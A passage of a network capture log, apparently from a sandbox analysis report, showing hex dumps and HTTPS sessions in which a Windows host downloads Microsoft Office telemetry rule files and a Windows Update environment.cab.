26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00
                          Data Ascii: &`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>
                          2024-11-25 16:55:52 UTC1390INData Raw: e3 c3 e7 3a 00 64 ac 28 52 d7 53 77 00 00 00 00 00 30 a9 ba ed ba 70 78 0f 00 8c 0b 31 1f 00 64 ac db aa 4b df d1 01 00 00 00 00 60 52 95 45 d1 6d 79 ec 1f 00 c6 84 98 0f 00 72 55 55 0e d8 05 00 00 00 00 80 49 d7 6e 55 55 65 e9 1f 00 c6 81 4f 74 00 c8 55 57 c9 07 00 00 00 00 00 58 32 00 80 71 21 e6 03 80 2c b5 ea b2 f6 98 1d 00 00 00 00 00 90 52 5d 95 ad da aa 01 00 64 cf c7 39 00 64 a9 d3 aa a3 47 00 00 00 00 00 00 9a c2 c2 01 00 8c 01 31 1f 00 e4 a7 55 57 55 59 44 4f 01 00 00 00 00 00 34 45 55 16 ad da 61 bb 00 90 37 31 1f 00 e4 a7 d3 f2 6d 1c 00 00 00 00 00 f8 7f 2c 1f 00 40 ee c4 7c 00 90 99 ba 2a 6d cb 07 00 00 00 00 00 dc a2 2a 8b ba d2 00 00 40 c6 7c 90 03 40 66 3c 57 07 00 00 00 00 00 dc 91 45 04 00 c8 9a 98 0f 00 72 52 7a a8 0e 00 00 00 00 00 b8
                          Data Ascii: :d(RSw0px1dK`REmyrUUInUUeOtUWX2q!,R]d9dG1UWUYDO4EUa71m,@|*m*@|@f<WErRz
                          2024-11-25 16:55:52 UTC1390INData Raw: 64 3a 7a 0a 00 00 00 00 00 00 00 9a 4e cc 07 00 64 23 c7 92 af 73 e2 54 f4 14 00 00 00 00 00 00 00 64 40 cc 07 00 e4 41 c9 07 00 00 00 00 00 00 c0 18 13 f3 01 00 19 50 f2 01 00 00 00 00 00 00 30 de c4 7c 00 40 d3 ad cc ce 28 f9 00 00 00 00 00 00 00 18 6f 75 f4 00 00 00 9b b8 f2 d5 d3 3b 77 f3 ee f4 b1 b5 1f da 47 a6 d7 7e b8 39 3b 93 52 5a 9c 79 75 b8 1b 2a f9 00 00 00 00 00 00 00 18 82 98 0f 00 68 b4 5f 3f fb a5 91 df b3 3b 7d 6c ea c4 a9 94 52 fd 6e c0 f7 5e 9d 94 52 4a f7 a6 94 52 5a 3a 7f 36 a5 b4 f5 7d 01 95 7c 00 00 00 00 00 00 00 0c a7 58 b8 b6 18 3d 03 00 b0 89 fb f6 76 a2 47 88 b1 74 fe ec 08 0f d8 5d 6b f8 ee 18 f0 8d 64 12 25 1f 00 00 00 00 00 8d 72 f5 fa 52 f4 08 00 c0 00 c4 7c 00 90 81 89 8d f9 e6 3f 7d 6c 24 f7 d9 4e c6 f7 5e 1b 24 7d 4a 3e
                          Data Ascii: d:zNd#sTd@AP0|@(ou;wG~9;RZyu*h_?;}lRn^RJRZ:6}|X=vGt]kd%rR|?}l$N^$}J>
                          2024-11-25 16:55:52 UTC1390INData Raw: ae 1f 7b 7c fe 33 2f 2f ef bd fd a5 86 6c ce 37 dc 19 bb 8f 3d 54 8f 7c 12 00 00 00 00 00 00 00 f2 22 e6 03 00 1a a4 78 e0 f1 bb bd 74 cb d1 ba b7 78 e5 ed 37 cf cd bd b8 33 43 6d d5 ec e5 de 70 67 ec 1e 7e a8 18 f9 30 00 00 00 00 00 00 00 e4 45 cc 07 00 34 c8 dd 4e da dd b8 e4 5b 73 e6 d2 85 1d 98 68 00 c3 6d cb 97 52 72 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 59 aa 0f 9d 79 ef af 97 6e 3e fc f8 fc 67 36 2d f9 d6 7c f9 c7 df dc 91 99 b6 60 e8 6d f9 8e 1e 70 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 c1 5e b8 7e ec 8b 57 0f 6e fd fd 51 87 ed ce 5e ee 7d e5 fc 8d e1 ae fd e3 4f b6 46 3b 0c 00 00 00 00 00 00 00 39 12 f3 01 00 cd b2 7e d2 ee 56 8e d6 bd dd 99 4b 17 76 bf e7 1b fa 80 dd e4 8c 5d 00 00 00 00 00 00 00 52 4a 29 39 d6 0d 00 68 9c 7f ff f0 0b 7f f3 fa
                          Data Ascii: {|3//l7=T|"xtx73Cmpg~0E4N[shmRr.b>Yyn>g6-|`mp.b>^~WnQ^}OF;9~VKv]RJ)9h
                          2024-11-25 16:55:52 UTC1390INData Raw: 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13
                          Data Ascii: @01@01@01@01@01@01@01@01@01@01


                          Session IDSource IPSource PortDestination IPDestination Port
                          9192.168.2.44975913.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:25 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:26 UTC471INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:25 GMT
                          Content-Type: text/plain
                          Content-Length: 218853
                          Connection: close
                          Vary: Accept-Encoding
                          Cache-Control: public
                          Last-Modified: Sat, 23 Nov 2024 12:15:37 GMT
                          ETag: "0x8DD0BB889D4282C"
                          x-ms-request-id: c3062018-b01e-003e-79df-3d8e41000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165625Z-178bfbc474bpscmfhC1NYCfc2c00000006a000000000g68g
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:26 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                          2024-11-25 16:56:26 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                          Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                          2024-11-25 16:56:26 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                          Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                          2024-11-25 16:56:26 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                          Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                          2024-11-25 16:56:26 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                          Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                          2024-11-25 16:56:26 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                          Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                          2024-11-25 16:56:26 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                          Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                          2024-11-25 16:56:26 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                          Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                          2024-11-25 16:56:26 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                          Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                          2024-11-25 16:56:26 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                          Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.44976052.149.20.212443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:27 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4bXW47ENZmx3mpV&MD=hoFYSZH8 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                          Host: slscr.update.microsoft.com
                          2024-11-25 16:56:28 UTC560INHTTP/1.1 200 OK
                          Cache-Control: no-cache
                          Pragma: no-cache
                          Content-Type: application/octet-stream
                          Expires: -1
                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                          MS-CorrelationId: 9877c70b-1dad-4d74-9d07-534b2ddd8ec6
                          MS-RequestId: a109df16-2594-4c6f-84b0-daa3e8f3c0a3
                          MS-CV: d66IGQbViES5gx/u.0
                          X-Microsoft-SLSClientCache: 1440
                          Content-Disposition: attachment; filename=environment.cab
                          X-Content-Type-Options: nosniff
                          Date: Mon, 25 Nov 2024 16:56:27 GMT
                          Connection: close
                          Content-Length: 30005
                          2024-11-25 16:56:28 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                          2024-11-25 16:56:28 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                          Session IDSource IPSource PortDestination IPDestination Port
                          11192.168.2.44976413.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:28 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:29 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:28 GMT
                          Content-Type: text/xml
                          Content-Length: 408
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                          ETag: "0x8DC582BB56D3AFB"
                          x-ms-request-id: 2eed8dc4-701e-0098-0dc6-3e395f000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165628Z-178bfbc474b7cbwqhC1NYC8z4n00000007rg000000003tgr
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:29 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                          Session IDSource IPSource PortDestination IPDestination Port
                          12192.168.2.44976513.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:28 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:29 UTC494INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:28 GMT
                          Content-Type: text/xml
                          Content-Length: 2160
                          Connection: close
                          Vary: Accept-Encoding
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                          ETag: "0x8DC582BA3B95D81"
                          x-ms-request-id: 2aa1f1ad-b01e-003d-7c43-3cd32c000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165628Z-174c587ffdfldtt2hC1TEBwv9c000000062000000000cyd6
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
